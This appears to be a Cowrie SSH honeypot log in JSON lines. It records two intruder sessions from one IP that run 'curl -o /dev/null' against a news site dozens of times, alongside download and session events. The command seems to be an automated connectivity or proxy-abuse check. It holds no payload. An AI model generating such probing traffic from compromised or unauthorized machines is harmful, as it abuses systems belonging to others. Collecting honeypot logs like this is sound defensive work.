{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.339499Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:48.351851Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.352823Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.365450Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:48.377510Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.378420Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.391239Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:48.392796Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.394091Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.401312Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.403091Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.408002Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:48.419862Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.421070Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.425511Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.428652Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.432141Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:48.434755Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.435419Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.442913Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.448679Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:48.456768Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.457743Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.463713Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.465780Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:48.473617Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.474610Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.477901Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.485562Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.487580Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:48.493175Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.494011Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.496922Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.517514Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:48.518736Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.519563Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:48.528869Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.530502Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.534045Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:48.556376Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.557508Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:48.578000Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.579733Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.583520Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:48.613125Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.614180Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:48.617853Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.618436Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.627366Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:48.656249Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.657264Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:48.659483Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.660499Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.674649Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.677682Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.679086Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:48.694315Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.695230Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:48.698241Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.699230Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.714997Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.735780Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:48.737070Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.738237Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:48.740374Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.741678Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.752154Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:48.778433Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.779462Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.783988Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:48.785491Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.787049Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.793059Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.798108Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.801208Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.810962Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:48.815660Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
